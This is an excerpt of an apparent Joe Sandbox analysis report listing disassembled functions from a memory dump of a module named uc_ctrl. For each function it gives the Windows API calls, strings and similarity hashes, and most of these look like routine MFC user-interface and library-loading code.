Instruction ID: 6e56719c2509fe1b13a889edfd0e90b4bd299d521c0cd7c59b574d04efd0af85
Opcode Fuzzy Hash: 1e21b8678bda1ef1baabdcb9dd6a19961263c30b7ac4a75e692e3a55595ec706
Instruction Fuzzy Hash: 5011C270A01251ABCF00DFB9C848A6EBFB5BF45314B158118F818CBB51EB34D811CBA0

Function 6CB1E5AD Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

TlsFree.KERNEL32(6CD572B4,2FC9D75A,?,?,00000001,6CC75AC4,000000FF,?,6CB1E702,00000000,00000001), ref: 6CB1E5F4
GlobalHandle.KERNEL32(00F66658), ref: 6CB1E603
GlobalUnlock.KERNEL32(00000000,?,?,00000001,6CC75AC4,000000FF,?,6CB1E702,00000000,00000001), ref: 6CB1E60C
GlobalFree.KERNEL32(00000000), ref: 6CB1E613
DeleteCriticalSection.KERNEL32(6CD572D0,2FC9D75A,?,?,00000001,6CC75AC4,000000FF,?,6CB1E702,00000000,00000001), ref: 6CB1E61D

Part of subcall function 6CB1E867: EnterCriticalSection.KERNEL32(6CD572D0,6CD572B4,00000000,6CD572D0), ref: 6CB1E8E1
Part of subcall function 6CB1E867: LeaveCriticalSection.KERNEL32(6CD572D0,?), ref: 6CB1E8F4
Part of subcall function 6CB1E867: LocalFree.KERNEL32(00000000), ref: 6CB1E8FD
Part of subcall function 6CB1E867: TlsSetValue.KERNEL32(?,00000000), ref: 6CB1E918

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
String ID:
API String ID: 1549993015-0
Opcode ID: e02acb883880f88e48f967e02870dd3401b151319830dce19c21771ea0b5c586
Instruction ID: d3f221afd41e1e67e40f2a57f2401cd614b9ff0cdba700e43cdeb13308a3f7e6
Opcode Fuzzy Hash: e02acb883880f88e48f967e02870dd3401b151319830dce19c21771ea0b5c586
Instruction Fuzzy Hash: 23018031605595EBCB118F25C808B6ABBB8FB46725F180225F911C3E80DB35A811CBE1

Function 6CC127D9 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(00000000,?,?,?,6CC128B6,?,?,?,6CB97061,?,00000000,0014000C,00000000), ref: 6CC127EB
GlobalLock.KERNEL32(00000000,?,?,?,6CC128B6,?,?,?,6CB97061,?,00000000,0014000C,00000000), ref: 6CC127FB

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: GlobalLock
String ID:
API String ID: 2848605275-0
Opcode ID: e48378dce4d081924f0a986ea61c5e3fc66b538c3ed59f3a8acb3943add126a3
Instruction ID: 741e41e8bcffc42ddd73e28439aecab0d2776b373df13966fd11e8ce62c32299
Opcode Fuzzy Hash: e48378dce4d081924f0a986ea61c5e3fc66b538c3ed59f3a8acb3943add126a3
Instruction Fuzzy Hash: 0C01713A20991AAB8B514B6AC80CA6BBBB8BF877957144021F904C3910EB34D511D7B0

Function 6CB3FD55 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

PtInRect.USER32(?,?,?), ref: 6CB3FD73
RedrawWindow.USER32(?,00000000,00000000,00000401), ref: 6CB3FD91
PtInRect.USER32(?,?,?), ref: 6CB3FDAE
ReleaseCapture.USER32 ref: 6CB3FDBE
RedrawWindow.USER32(?,00000000,00000000,00000401), ref: 6CB3FDCE

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: RectRedrawWindow$CaptureRelease
String ID:
API String ID: 1080614547-0
Opcode ID: 8208a5cac0d55275e8e78c020f7829294b0706769a5ba8df8d134581b92aaefe
Instruction ID: 0e2d4d4cabc81f0bebdd1bf4fed13a07407ebf5d598faa5df32497a7c4fdd920
Opcode Fuzzy Hash: 8208a5cac0d55275e8e78c020f7829294b0706769a5ba8df8d134581b92aaefe
Instruction Fuzzy Hash: 07015E31201765ABCF124F65CC48E9B7FB9FF86715F00981AF69E82510DB31A015DB50

Function 6CB4AD75 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161memorywindowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB4AD7F
GlobalAlloc.KERNEL32(00000040,0000000C), ref: 6CB4AE08
SendMessageW.USER32 ref: 6CB4AF17

Strings

g, xrefs: 6CB4ADF0

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: AllocGlobalH_prolog3MessageSend
String ID: g
API String ID: 3600573425-30677878
Opcode ID: 7af1a16fb802a2b0cbf941a4e2de6105ef6ae02f7dd6faaa73dc1c2b67c5c5bf
Instruction ID: ff8c30db0abb459d2fdeec9f3c4d09c42240d0cb834b4a349b135962b2569741
Opcode Fuzzy Hash: 7af1a16fb802a2b0cbf941a4e2de6105ef6ae02f7dd6faaa73dc1c2b67c5c5bf
Instruction Fuzzy Hash: 1A5157B1A002199FDF14CFA4C885BEEBBB5BF08704F104159E516BB790EB74AA15CFA4

Function 6CB27288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 6CB1FB34: LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6CB2063F,00000000,?,?,6CAFF6D7,6CD5244C), ref: 6CB1FB48

__CxxThrowException@8.LIBVCRUNTIME ref: 6CB27293

Part of subcall function 6CC56276: RaiseException.KERNEL32(?,?,?,00000001,00000000,?,00000000), ref: 6CC562D5

GetClassInfoW.USER32(?,0000007C,?), ref: 6CB27349

Strings

Afx:%p:%x, xrefs: 6CB272D9
Afx:%p:%x:%p:%p:%p, xrefs: 6CB2730F

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ClassCriticalExceptionException@8InfoLeaveRaiseSectionThrow
String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
API String ID: 569307812-2801496823
Opcode ID: d3b1a71aa01c84afbb02f787dfbb48755bed8f50ed7b2feda8022cd1a97db1b9
Instruction ID: c818855ad502ffe9e383f462b245e6281e97affedf64e4c1aefcd59afb2e5579
Opcode Fuzzy Hash: d3b1a71aa01c84afbb02f787dfbb48755bed8f50ed7b2feda8022cd1a97db1b9
Instruction Fuzzy Hash: 21316D70D00249EFDB10DFA9C840BDEBBB4EF09318F004016F909A7B50EB759A65CB66

Function 6CB4CCF7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB4CCFE
SetRectEmpty.USER32(00000000), ref: 6CB4CD35
SendMessageW.USER32(00000000,00001036,00000000,00000020), ref: 6CB4CDA4

Strings

SysListView32, xrefs: 6CB4CD80

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: EmptyH_prolog3_MessageRectSend
String ID: SysListView32
API String ID: 1451865993-78025650
Opcode ID: febca460107aaf527eb8a27519d36ce2b7a2f68fbf29d77f4148ee348a088aa6
Instruction ID: 03f8c5e42570ff7626aab0c6b9052248c5d0cbb413fb98a36260e27d43aec65c
Opcode Fuzzy Hash: febca460107aaf527eb8a27519d36ce2b7a2f68fbf29d77f4148ee348a088aa6
Instruction Fuzzy Hash: 6A11D271E05368ABDB209FA88885EEFBAB4FF89714F50061DE1346B7C4D7708905CB50

Function 6CB22209 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB212F2: LoadLibraryW.KERNEL32(?,6CD140E0,00000010,6CB20DCC,?), ref: 6CB21323

GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 6CB22248
FreeLibrary.KERNEL32(00000000,?,comctl32.dll), ref: 6CB22293

Part of subcall function 6CB221F6: GetLastError.KERNEL32 ref: 6CB221F6

Strings

DllGetVersion, xrefs: 6CB22242
comctl32.dll, xrefs: 6CB22221

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Library$AddressErrorFreeLastLoadProc
String ID: DllGetVersion$comctl32.dll
API String ID: 2540614322-3857068685
Opcode ID: 47ddf39b5d9c934b3be07ca0fd3d0ff9b13a5016530fb67ea30fd65031961cdb
Instruction ID: 7a6c869d2b5bade94f2ab2691724de725b8f9c0b2c826450420094f3663465ea
Opcode Fuzzy Hash: 47ddf39b5d9c934b3be07ca0fd3d0ff9b13a5016530fb67ea30fd65031961cdb
Instruction Fuzzy Hash: 22110D75A112099BCB01DFA8CC45BEF7BF4EF85325F500015E908E7740EB39D90487A2

Function 6CB4FC03 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB4FC0A
LoadCursorW.USER32(00000000,00007F00), ref: 6CB4FC2F
GetClassInfoW.USER32(?,?,?), ref: 6CB4FC70

Part of subcall function 6CB1FBA5: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBB9

Strings

%Ts:%x:%x:%x:%x, xrefs: 6CB4FC5B

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ClassCursorException@8H_prolog3InfoLoadThrow
String ID: %Ts:%x:%x:%x:%x
API String ID: 3514338993-4057404147
Opcode ID: 65211f1854d805f6e64ecce6fd02e78233aecc1640fdd68006ce99b829a43684
Instruction ID: 4a280d546ca1bbf09148e1c6a83da6c4ed0496071fb40d7b7ad167d8437237c6
Opcode Fuzzy Hash: 65211f1854d805f6e64ecce6fd02e78233aecc1640fdd68006ce99b829a43684
Instruction Fuzzy Hash: EF211AB0E00248AFDB10DFA9C884ADEBBB8FF09748F104429E908E7740E7749648DB65

Function 6CB2715B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB1FAC0: EnterCriticalSection.KERNEL32(6CD57498,?,?,00000000,?,6CB2063F,00000000,?,?,6CAFF6D7,6CD5244C), ref: 6CB1FAF1
Part of subcall function 6CB1FAC0: InitializeCriticalSection.KERNEL32(00000000,?,?,00000000,?,6CB2063F,00000000,?,?,6CAFF6D7,6CD5244C), ref: 6CB1FB07
Part of subcall function 6CB1FAC0: LeaveCriticalSection.KERNEL32(6CD57498,?,?,00000000,?,6CB2063F,00000000,?,?,6CAFF6D7,6CD5244C), ref: 6CB1FB15
Part of subcall function 6CB1FAC0: EnterCriticalSection.KERNEL32(00000000,?,00000000,?,6CB2063F,00000000,?,?,6CAFF6D7,6CD5244C), ref: 6CB1FB22

Part of subcall function 6CB1E9FD: __EH_prolog3_catch.LIBCMT ref: 6CB1EA04

Part of subcall function 6CB20D03: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6CB20D29
Part of subcall function 6CB20D03: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6CB20D39
Part of subcall function 6CB20D03: EncodePointer.KERNEL32(00000000), ref: 6CB20D42
Part of subcall function 6CB20D03: LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 6CB20D64

GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6CB2719D
FreeLibrary.KERNEL32(?,?,Function_0002C806), ref: 6CB271AD

Strings

HtmlHelpW, xrefs: 6CB27197
hhctrl.ocx, xrefs: 6CB27181

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CriticalSection$AddressEnterLibraryProc$EncodeFreeH_prolog3_catchHandleInitializeLeaveLoadModulePointer
String ID: HtmlHelpW$hhctrl.ocx
API String ID: 2316587930-3773518134
Opcode ID: e4030f28198bdfc7427edde63cd59395cefe994103b959e3798f77a7a01b7a35
Instruction ID: c503780798eb4b1af78c7a01cd53512c4ae1e0cc49f4024e48c0185e1120ed92
Opcode Fuzzy Hash: e4030f28198bdfc7427edde63cd59395cefe994103b959e3798f77a7a01b7a35
Instruction Fuzzy Hash: 1901F231585B97EBDB101FA5CC04B6F3FA1EF0175AF008829E95DA6E50DB74D4108BA6

Function 6CB1D8BC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,00000010,?,?,6CB1D7AF,?,00000010), ref: 6CB1D8CF
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 6CB1D8DF

Strings

Advapi32.dll, xrefs: 6CB1D8CA
RegDeleteKeyTransactedW, xrefs: 6CB1D8D9

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyTransactedW
API String ID: 1646373207-2168864297
Opcode ID: 72a27730ad9edd61b273058e1611727f48ab01888ad3a8acbbbfa96f85080a74
Instruction ID: b29f16241f026ccc530279f3e9dc838fac0415578dc464df841aafa9fd57a62a
Opcode Fuzzy Hash: 72a27730ad9edd61b273058e1611727f48ab01888ad3a8acbbbfa96f85080a74
Instruction Fuzzy Hash: D2F0B47730A549EFAF121EA4AC449677BBDEB821FD310483AF65492D10DA3288218765

Function 6CB31594 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?), ref: 6CB315AF
GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedW), ref: 6CB315BF

Strings

kernel32.dll, xrefs: 6CB315AA
GetFileAttributesTransactedW, xrefs: 6CB315B9

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetFileAttributesTransactedW$kernel32.dll
API String ID: 1646373207-1378992308
Opcode ID: 5ab2af0996f79b560feab48ea33380dcf4abc2972d09abd6cb05cc9da364f44e
Instruction ID: 9cee278e42f8c2a2207d3b05dc40538d09e385e3774586b7370b1a58fafdf1b0
Opcode Fuzzy Hash: 5ab2af0996f79b560feab48ea33380dcf4abc2972d09abd6cb05cc9da364f44e
Instruction Fuzzy Hash: D9F0C2322462A6EFEF010F948C44B9A7BEDFB05359F1D742ABA1A82810EB71D810C665

Function 6CB46213 Relevance: 6.4, APIs: 4, Instructions: 381keyboardCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB4621A
GetAsyncKeyState.USER32(00000011), ref: 6CB46273

Part of subcall function 6CB48B51: __EH_prolog3_GS.LIBCMT ref: 6CB48B58
Part of subcall function 6CB48B51: IsRectEmpty.USER32(?), ref: 6CB48B73
Part of subcall function 6CB48B51: InvertRect.USER32(?,?), ref: 6CB48B89
Part of subcall function 6CB48B51: SetRectEmpty.USER32(?), ref: 6CB48B96

GetAsyncKeyState.USER32(00000011), ref: 6CB465DC
GetAsyncKeyState.USER32(00000012), ref: 6CB46623

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: AsyncRectState$Empty$H_prolog3H_prolog3_Invert
String ID:
API String ID: 1053828128-0
Opcode ID: fb2f3c3547ac42100f327b93e4b2c144772dd125a859909a4b363ccfc8938498
Instruction ID: 1cead43bb25738c481772a8ec572201003caea40aa3591817386f88b8bcf722e
Opcode Fuzzy Hash: fb2f3c3547ac42100f327b93e4b2c144772dd125a859909a4b363ccfc8938498
Instruction Fuzzy Hash: C1D1AE70A092809BDF05CF18C494BAD37B6EF85748F14816EDC15AFB99DB30E944EB62

Function 6CBB4D44 Relevance: 6.3, APIs: 4, Instructions: 289keyboardCOMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 6CBB4D72
GetKeyState.USER32(00000011), ref: 6CBB4D7A
IsRectEmpty.USER32(?), ref: 6CBB4DE1
GetWindowRect.USER32(00000000,?), ref: 6CBB4FAD

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
